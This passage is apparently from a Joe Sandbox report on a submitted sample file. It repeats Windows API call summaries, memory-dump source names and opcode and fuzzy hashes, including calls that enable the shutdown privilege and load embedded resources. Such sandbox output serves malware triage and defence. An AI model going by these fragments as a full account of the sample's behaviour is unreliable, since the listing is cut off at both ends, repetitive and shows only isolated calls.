                                                                                          • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1658689577-0
                                                                                        • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                        • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                        • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                        • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                        • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                        • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                        • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                        • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                        • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                        • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                        • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                        • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                        • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastWrite
                                                                                        • String ID:
                                                                                        • API String ID: 442123175-0
                                                                                        • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                        • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                        • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                        • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                        APIs
                                                                                        • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage
                                                                                        • String ID:
                                                                                        • API String ID: 1306739567-0
                                                                                        • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                        • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                        • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                        • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                        APIs
                                                                                        • SetEndOfFile.KERNEL32(?,02088000,0040AA59,00000000), ref: 004076B3
                                                                                          • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 734332943-0
                                                                                        • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                        • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                        • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                        • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                        • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                        • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                        • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                        • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                        • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                        • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                        APIs
                                                                                        • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharPrev
                                                                                        • String ID:
                                                                                        • API String ID: 122130370-0
                                                                                        • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                        • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                        • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                        • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                        • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                        • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                        • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                        • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                        • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                        • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                        • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                        • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                        • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                        • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                        • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                        • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                        • String ID: SeShutdownPrivilege
                                                                                        • API String ID: 107509674-3733053543
                                                                                        • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                        • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                        • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                        • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                        • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3473537107-0
                                                                                        • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                        • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                        • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                        • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                        • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                        • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                        • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                        APIs
                                                                                        • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: SystemTime
                                                                                        • String ID:
                                                                                        • API String ID: 2656138-0
                                                                                        • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                        • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                        • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                        • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        • API String ID: 1889659487-0
                                                                                        • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                        • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                        • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                        • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                        • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                        • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                        • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
